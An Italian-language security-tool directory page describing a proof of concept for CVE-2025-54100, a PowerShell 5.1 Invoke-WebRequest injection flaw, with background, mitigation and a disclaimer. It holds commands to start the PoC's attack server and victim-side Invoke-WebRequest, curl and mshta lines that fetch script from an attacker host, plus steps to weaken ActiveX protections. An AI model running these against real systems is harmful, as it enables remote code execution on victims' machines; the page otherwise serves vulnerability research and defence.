Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-54100 — CVE-2025-54100 (CVSS 7.8 Alto) è una vulnerabilità di command injection nel cmdlet Invoke-WebRequest di Windows PowerShell 5.1. Deriva da una neutralizzazione impropria di elementi speciali durante l'analisi automatica delle risposte Web. | Kitploit
Strumenti/GitHubGitHub/themehackers/cve-2025-54100
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingPaper e RicercaApprendimento e Formazione
GitHubthemehackers/cve-2025-54100

CVE-2025-54100

CVE-2025-54100 (CVSS 7.8 Alto) è una vulnerabilità di command injection nel cmdlet Invoke-WebRequest di Windows PowerShell 5.1. Deriva da una neutralizzazione impropria di elementi speciali durante l'analisi automatica delle risposte Web.

Vedi Repository
31749 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-54100 – PoC di Analisi della Risposta di PowerShell

Un Proof-of-Concept conciso che mostra come CVE-2025-54100 possa portare a Esecuzione di Codice Remoto (RCE) in Windows PowerShell 5.1 attraverso il parsing HTML dannoso.

Sommario

  • Cos'è CVE-2025-54100?
  • Come Funziona il PoC
  • Avvio Rapido
  • Attivazione da un Host Vittima
  • Risoluzione Problemi e Verifica
  • Evidenza
  • Mitigazione
  • Disclaimer
  • Riferimenti

Cos'è CVE-2025-54100?

  • Tipo: Iniezione di comandi in Invoke-WebRequest quando non si utilizza -UseBasicParsing
  • Gravità: CVSS 7.8 (Alta)
  • Causa principale: Il parsing basato su MSHTML delle risposte HTML consente l'esecuzione di script (ad es., ActiveXObject) nel contesto del chiamante.
  • Interessati: Windows 10/11 e Windows Server 2008-2025 che eseguono PowerShell 5.1.
  • Come Funziona il PoC

    1. Il server FastAPI in CVE-2025-54100.py serve un payload HTML appositamente costruito.
    2. Il payload tenta di istanziare oggetti ActiveX WScript.Shell / Shell.Application.
    3. Su host vulnerabili, il parser MSHTML esegue lo script, dimostrando RCE avviando calc.exe.
    4. Il payload fornito è intenzionalmente minimo e non distruttivo ma può essere modificato per ulteriori ricerche.

    Avvio Rapido

    Prerequisiti

    • Python 3.10+ (testato con FastAPI e Uvicorn)
    • Installa le dipendenze:
      root@kitploit:~
      python3 -m venv .venv
      source .venv/bin/activate
      pip3 install -r requirements.txt
      

    Avvia il server dannoso

    Avvia il server HTTP del PoC:

    root@kitploit:~
    uvicorn app:app --host 0.0.0.0  --port 8888 --reload
    

    Attivazione da un Host Vittima

    Esegui questi su una macchina Windows vulnerabile senza -UseBasicParsing:

    root@kitploit:~
    # Invoke-WebRequest
    Invoke-WebRequest -Uri "http://<attacker-ip>:8888"
    # curl alias
    curl http://<attacker-ip>:8888
    # mshta
    mshta http://<attacker-ip>:8888
    

    Usa la stessa porta che hai configurato per il server. Se vulnerabile, lo script incorporato viene eseguito tramite il parser MSHTML. Alcuni prodotti AV potrebbero bloccare il comportamento anche se il problema di parsing è presente.

    Risoluzione Problemi e Verifica

    Se calc.exe non appare:

    1. Apri Opzioni Internet sulla vittima.
    2. Vai a Sicurezza → Livello personalizzato...
    3. Abilita “Inizializza e scrivi script per controlli ActiveX non contrassegnati come sicuri per lo scripting.”
    4. Esegui nuovamente Invoke-WebRequest senza -UseBasicParsing.

    Questo dimostra il vettore di esecuzione. I payload reali potrebbero utilizzare offuscamento o bypass aggiuntivi per eludere le restrizioni predefinite.

    Evidenza

    PoC

    Mitigazione

    Microsoft ha corretto il problema a dicembre 2025:

    1. Applica gli aggiornamenti di sicurezza sugli host Windows interessati.
    2. Usa -UseBasicParsing per evitare il parsing MSHTML:
      root@kitploit:~
      Invoke-WebRequest -Uri "http://<attacker-ip>:8888" -UseBasicParsing
      
    3. Passa a PowerShell 7+ (pwsh), che non si basa su MSHTML per il parsing.

    Disclaimer

    [!WARNING] Solo per uso educativo e test autorizzati. Utilizza responsabilmente e rispetta tutte le leggi applicabili. Gli autori non sono responsabili per uso improprio o danni.

    Riferimenti

    • NVD: CVE-2025-54100
    • MSRC: Update Guide
    • GitHub: osman1337-security/CVE-2025-54100
    Scarica lo strumento